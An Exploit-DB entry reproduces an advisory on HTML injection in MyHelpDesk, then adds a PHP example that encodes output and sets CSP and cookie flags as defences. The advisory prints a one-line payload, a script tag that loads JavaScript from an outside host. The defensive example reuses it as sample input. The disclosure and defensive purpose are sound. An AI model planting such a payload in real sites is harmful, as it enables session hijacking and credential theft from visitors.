exploit-db-mirror/platforms/php/webapps/21519.txt
Offensive Security 5e2fc10125 DB: 2016-09-03
2016-09-03 13:13:25 +00:00


source: http://www.securityfocus.com/bid/4967/info
It has been reported that MyHelpDesk is vulnerable to HTML injection attacks.
MyHelpDesk does not properly sanitize HTML tags from form fields. Attackers may pass arbitrary HTML and script code through the unsanitized form fields or through parameters specified via URL. The attacker-supplied HTML code will be executed by the web client of users who visit such pages, in the security context of the site running the vulnerable software.
This may potentially be exploited to hijack web content or steal cookie-based authentication credentials from legitimate users.
<script src="http://forum.olympos.org/f.js">Alper</script>
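
The root cause described above is output that reaches the browser without HTML encoding. The PHP below is an added example, not MyHelpDesk's code (which the advisory does not show): it encodes form-field and URL-parameter values at the point of output and sets the response controls that limit the cookie-theft impact the advisory names. The ticket structure, the field names and the function names `h` and `render_ticket` are assumptions made for illustration.

```php
<?php
// Added example. MyHelpDesk's real templates are not on the page; the ticket
// array and its keys (subject, body, id) are hypothetical.

/** Encode untrusted text for an HTML text node or a quoted attribute value. */
function h(string $value): string
{
    // ENT_QUOTES encodes both " and ', so the value cannot close an attribute.
    // ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning ''.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Render one ticket with every user-controlled field encoded at output. */
function render_ticket(array $ticket): string
{
    return sprintf(
        "<div class=\"ticket\">\n  <h2>%s</h2>\n  <p>%s</p>\n"
        . "  <input type=\"hidden\" name=\"id\" value=\"%s\">\n</div>\n",
        h((string)($ticket['subject'] ?? '')),
        nl2br(h((string)($ticket['body'] ?? ''))), // encode first, then add <br>
        h((string)($ticket['id'] ?? ''))           // URL parameter echoed into an attribute
    );
}

// Constructed sample input: the subject carries the string quoted in the
// advisory; the other two values are made up to exercise tags and quotes.
$ticket = [
    'subject' => '<script src="http://forum.olympos.org/f.js">Alper</script>',
    'body'    => "Printer is offline\nSee <b>room 4</b>",
    'id'      => '12" data-x="1',
];

if (PHP_SAPI !== 'cli') {
    // Defence in depth: block scripts from other origins and keep the session
    // cookie out of reach of page scripts. Array form needs PHP >= 7.3 and
    // must run before session_start().
    header("Content-Security-Policy: default-src 'self'; script-src 'self'");
    session_set_cookie_params(['httponly' => true, 'samesite' => 'Lax']);
}

// The subject is emitted as &lt;script src=&quot;...&quot;&gt;..., i.e. inert text.
echo render_ticket($ticket);
```

Encoding is applied when the value is written into HTML, not when it is stored, so values already saved by a vulnerable version are also neutralised on display.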